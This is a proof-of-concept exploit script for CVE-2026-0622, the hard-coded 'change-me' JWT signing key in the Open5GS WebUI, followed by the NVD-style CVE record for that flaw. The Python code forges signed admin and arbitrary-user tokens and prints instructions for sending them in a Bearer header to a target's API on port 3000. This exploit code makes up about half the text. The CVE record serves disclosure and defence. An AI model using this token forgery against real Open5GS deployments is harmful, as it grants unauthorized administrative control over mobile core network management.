CVE-2026-0622

# CVE-2026-0622 PoC - Open5GS WebUI Hardcoded JWT Secret # This PoC demonstrates how to forge JWT tokens using the hardcoded secret import json import base64 import hmac import hashlib def base64url_encode(data): """URL-safe base64 encoding""" if isinstance(data, str): data = data.encode('utf-8') return base64.urlsafe_b64encode(data).rstrip(b'=').decode('utf-8') def create_jwt_hardcoded_secret(payload, secret="change-me"): """ Create JWT token using the hardcoded secret from Open5GS WebUI The secret 'change-me' is used when JWT_SECRET_KEY env var is not set """ header = { "alg": "HS256", "typ": "JWT" } # Encode header and payload header_encoded = base64url_encode(json.dumps(header)) payload_encoded = base64url_encode(json.dumps(payload)) # Create signature message = f"{header_encoded}.{payload_encoded}" signature = hmac.new( secret.encode('utf-8'), message.encode('utf-8'), hashlib.sha256 ).digest() signature_encoded = base64url_encode(signature) return f"{message}.{signature_encoded}" def forge_admin_token(): """Forge admin token to gain administrator privileges""" payload = { "sub": "admin", "role": "admin", "iat": 1737408000, "exp": 1737494400 } return create_jwt_hardcoded_secret(payload) def forge_any_user_token(username): """Forge token for any arbitrary user""" payload = { "sub": username, "role": "user", "iat": 1737408000, "exp": 1737494400 } return create_jwt_hardcoded_secret(payload) if __name__ == "__main__": print("=" * 60) print("CVE-2026-0622 PoC - Open5GS WebUI Hardcoded JWT Secret") print("=" * 60) # Forge admin token admin_token = forge_admin_token() print("\n[+] Forged Admin Token:") print(admin_token) # Forge arbitrary user token user_token = forge_any_user_token("attacker") print("\n[+] Forged User Token (attacker):") print(user_token) print("\n[!] Usage: Use these tokens in Authorization header:") print(" Authorization: Bearer <token>") print("\n[!] Target: http://<target>:3000/api/...")

{"cve": {"id": "CVE-2026-0622", "sourceIdentifier": "[email protected]", "published": "2026-01-20T20:16:01.483", "lastModified": "2026-02-03T21:38:57.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open 5GS WebUI uses a hard-coded JWT signing key (change-me) whenever the environment variable JWT_SECRET_KEY is unset"}, {"lang": "es", "value": "La WebUI de Open 5GS utiliza una clave de firma JWT embebida (cámbiame) siempre que la variable de entorno JWT_SECRET_KEY no está definida."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.6", "matchCriteriaId": "9C77332A-BAA3-4FE7-A237-B87F175C6F48"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/issues/2264", "source": "[email protected]", "tags": ["Vendor Advisory", "Issue Tracking"]}, {"url": "https://github.com/open5gs/open5gs/issues/856", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/open5gs/open5gs/pull/857", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://www.kb.cert.org/vuls/id/458022", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"]}]}}